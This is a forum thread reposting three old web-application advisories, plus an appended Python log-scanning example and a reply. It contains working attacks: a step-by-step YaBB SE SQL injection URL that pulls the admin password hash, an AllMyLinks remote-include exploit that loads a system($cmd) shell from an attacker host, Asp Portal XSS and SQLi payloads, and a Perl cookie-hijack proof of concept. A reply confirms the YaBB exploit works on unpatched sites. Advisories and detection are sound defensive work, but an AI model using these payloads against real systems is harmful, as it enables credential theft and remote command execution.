Nexcess
First YaBB Se (another one)

Details
Vulnerable Systems:
* YaBB SE versions 1.5.4, 1.5.5, possibly others

The file Post.php is vulnerable to SQL injection because the quote parameter
isn't checked against malicious input, so it is possible to inject SQL.

How To Exploit the vulnerability:

1- You need to be a registered user to exploit this hole.
2- Click any board you see, e.g. General Discussion.
3- Click any message, e.g. Welcome to YaBB SE!
4- Now view the source code of this page and search for the string "sesc"
(without the quotes). This is the session id, a hex number of 32 characters,
e.g. (13a478d8aa161c2231e6d3b36b6d19f2); you'll need this later.
5- Now your url is something like this:
http://vulnhost/yabbse/index.php?board=1;action=display;threadid=1
6- Change your url to look like this:

http://localhost:8080/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

The value of sesc is the value you got earlier from the source code.

And voilà, you get the hashed password of the user with id = 1 in the
Subject text box, something like this:
Re:e320774659b1b23333bd033754d21bc4


Vendor Status:
January 23, 2004: I contacted the vendor.
January 23, 2004: Vendor says they are working on it.
January 29, 2004: I sent another email to ask how the work was progressing.
No response.
February 3, 2004: I sent another email to ask about the status of the work.
February 4, 2004: Vendor says they'll figure out how to do it.
February 16, 2004: I don't want to keep waiting, so I am publishing the
vulnerability.

Temporary Solution:

Open Post.php and go to around line 49;

you'll see something like this:

$quotemsg = $quote;


change to this.

if ( !is_numeric($quote) )
{
   die('Go out C==|=======>');
}

$quotemsg = $quote;

that's it.


Credits go to: BackSpace



AllMyLinks PHP Code Injection vulnerability


******** AllMyLinks PHP Code Injection vulnerability ********

Product : AllMyLinks
Vendor : www.php-resource.net
Date : February 14, 2004
Problem : PHP Code Injection
Vendor Contacted ? : No

************************** Source ****************************

in /include/footer.inc.php

--------------------------------------------------------------

$AML_footer_get =
require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");

--------------------------------------------------------------

************************** Exploit ***************************

http://[target]/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a

in http://[attacker]/include/template.inc.php have :

------------------------

<?
system($cmd);
?>

------------------------

************************** Impact ****************************

A malicious user can execute arbitrary commands on the server.

************************* Solution ***************************

in /include/footer.inc.php replace

$AML_footer_get =
require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");


with


if (isset($_AMLconfig['cfg_serverpath'])){
 die("Don't Hack it :)");  // inside double quotes PHP keeps \' literally, so the backslash is dropped
}

$AML_footer_get =
require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php");



Asp Portal Multiple Vulnerabilities


Title: Asp Portal Multiple Vulnerabilities

By: Manuel López

Software: Asp Portal

Vendor Description:
ASP Portal is an ASP-powered portal site which uses an Access database to store all the site info. The script also includes an easy-to-use Admin Interface, so you can change everything you need to online, which makes maintaining the site very easy.

Severity:
Moderately critical

Impact:
Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, ID Spoofing.

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Description:

---- Cross-Site Scripting ----

This product is vulnerable to Cross-Site Scripting, which would allow attackers to inject HTML and script code into the pages and execute it in the client's browser.

http://localhost/index.asp?inc='>[XSS]
http://localhost/index.asp?inc=profile&searchtext='>[XSS]
http://localhost/index.asp?inc=forumread&article='>[XSS]

---- Image ScriptCode Injection ----

An attacker can inject arbitrary HTML or script code instead of an image in the "photograph URL" field of the user's 'details' page.
javascript:alert()

---- Sql Injection ----

Another sanitization problem could let an attacker inject SQL code to manipulate and disclose various information from the database. The problem is in the fields 'pageid' and 'downloadscat'.

http://localhost/index.asp?inc=blog&pageid='[SqlQuery]
http://localhost/index.asp?inc=downloadssub&downloadscat='[SqlQuery]

SQL injection is also possible in the cookie, in the 'thenick' field.

GET http://localhost/index.asp HTTP/1.1
Cookie: thenick='[SqlQuery]

---- Cookie Account Hijack ----

It is possible to impersonate others by manipulating the 'thenick' parameter in the cookie.
By modifying the cookie it is possible to gain access to another account. This issue can be exploited to gain an administrative account with the service.

---- PROOF OF CONCEPT COOKIE ACCOUNT HIJACK ----

#!/usr/bin/perl -w
## PROOF OF CONCEPT COOKIE ACCOUNT HIJACK
## Example: Asp-POC.pl localhost portal/index.asp Admin respuesta.htm

use IO::Socket;
if (@ARGV < 4)
{
print "\n\n";
print " ____________________________________________________________ \n";
print "|                                                            |\n";
print "|   PROOF OF CONCEPT COOKIE ACCOUNT HIJACK                   |\n";
print "|   Usage:Asp-POC.pl [host] [directorio] [usuario] [fichero] |\n";
print "|                                                            |\n";
print "|   By: Manuel López #IST                                    |\n";
print "|____________________________________________________________|\n";
print "\n\n";
exit(1);
}

$host = $ARGV[0];
$directorio = $ARGV[1];
$usuario = $ARGV[2];
$fichero = $ARGV[3];

print "\n";
print "----- Conectando <----\n";
$socket = IO::Socket::INET->new(Proto => "tcp",
PeerAddr => "$host",PeerPort => "80") || die "$socket error $!";
print "====> Conectado\n";
print "====> Enviando Datos\n";
$socket->print(<<taqui) or die "write: $!";
GET http://$host/$directorio HTTP/1.1
Cookie: thenick=$usuario

taqui
print "====> OK\n";
print "====> Generando $fichero ...\n";
open( Result, ">$fichero");
print Result while <$socket>;
close Result;

------------------------------------------------

Solution:
Vendor contacted.
The vulnerabilities have reportedly been fixed in the new version.
Download the January patch: http://www.aspportal.net/downloadsviewer.asp?theurl=38 or buy the new version.




I signed up for all the security mailing lists that I found to have much worthwhile content. If the staff here doesn't want me passing all these along, I'll chill

-Nexy
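As an added defender-side example (not part of Nexcess's post or any of the quoted advisories), here is a small Python scanner that flags, in web-server access logs, the three request patterns the advisories describe: a non-numeric YaBB SE quote / Asp Portal pageid or downloadscat value, an absolute URL fed to AllMyLinks' _AMLconfig[cfg_serverpath] on a direct request to an include file, and SQL metacharacters in the Asp Portal thenick cookie. The log lines are constructed, and the trailing cookie field assumes the server logs %{Cookie}i.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format plus a trailing "%{Cookie}i"
# field, an assumption of this example) modelled on the three advisories above.
SAMPLE_LOG = r'''
203.0.113.5 - - [16/Feb/2004:10:00:01 +0000] "GET /yabbse/index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12%29+UNION+SELECT+passwd,null,null+FROM+yabbse_members+where+ID_MEMBER=1/* HTTP/1.1" 200 4120 "-" "Mozilla/4.0" "-"
198.51.100.7 - - [16/Feb/2004:10:01:00 +0000] "GET /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://attacker.example/&cmd=uname%20-a HTTP/1.1" 200 210 "-" "curl/7.10" "-"
192.0.2.9 - - [16/Feb/2004:10:02:00 +0000] "GET /portal/index.asp HTTP/1.1" 200 9001 "-" "Mozilla/4.0" "thenick=' OR 1=1--"
192.0.2.9 - - [16/Feb/2004:10:02:01 +0000] "GET /portal/index.asp?inc=blog&pageid=7 HTTP/1.1" 200 9001 "-" "Mozilla/4.0" "thenick=alice"
'''

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
                    r'\d{3} \S+ "[^"]*" "[^"]*" "(?P<cookie>[^"]*)"$')
NUMERIC_ID_PARAMS = {"quote", "pageid", "downloadscat"}  # ids named in the advisories
SQLI_RE = re.compile(r"'|/\*|--|\bunion\s+select\b", re.IGNORECASE)
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def parse_params(query):
    """Split on '&' and ';' (YaBB SE uses ';') and URL-decode both halves of each pair."""
    return [(unquote_plus(k), unquote_plus(v)) for k, _, v in
            (p.partition("=") for p in re.split(r"[&;]", query) if p)]

def check_request(target, cookie_header):
    """Return the reasons a request matches one of the three advisory patterns."""
    path, _, query = target.partition("?")
    reasons = []
    for key, val in parse_params(query):
        if key in NUMERIC_ID_PARAMS and not re.fullmatch(r"-?\d+", val):
            reasons.append(f"non-numeric value in id parameter {key!r}")
        if URL_RE.match(val):
            reasons.append(f"absolute URL in parameter {key!r} (remote include attempt)")
    if path.endswith(".inc.php"):
        reasons.append("direct request to an include file")
    for item in cookie_header.split(";"):  # Cookie header: name=value; name=value
        name, _, val = item.strip().partition("=")
        if name == "thenick" and SQLI_RE.search(val):
            reasons.append("SQL metacharacters in 'thenick' cookie")
    return reasons

def scan_log(text):
    """Return (client ip, request target, reasons) for each suspicious log line."""
    hits = []
    for m in filter(None, map(LOG_RE.match, text.strip().splitlines())):
        reasons = check_request(m["target"], m["cookie"])
        if reasons:
            hits.append((m["ip"], m["target"], reasons))
    return hits
```

The numeric check mirrors the is_numeric() fix above, so the same rule that blocks the request on the server can be used to find earlier attempts in old logs.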
schnibble
I used that yabbse exploit and it works. Still no official patch. Quite useful. You can execute any SQL command. But, perhaps, better advice would be to use the quote button and then change the url, because of localisation or language selection, which changes the url a bit.
Invision Power Board © 2001-2005 Invision Power Services, Inc.